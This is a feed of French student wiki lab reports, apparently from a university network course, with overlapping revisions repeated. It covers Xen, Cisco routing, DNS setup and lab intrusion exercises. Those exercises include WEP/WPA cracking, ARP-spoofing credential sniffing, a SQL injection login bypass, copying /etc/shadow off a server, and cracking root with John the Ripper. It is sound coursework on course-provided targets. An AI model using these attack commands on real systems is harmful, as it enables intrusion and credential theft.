Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53715</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53715"/>
				<updated>2020-11-16T14:53:53Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
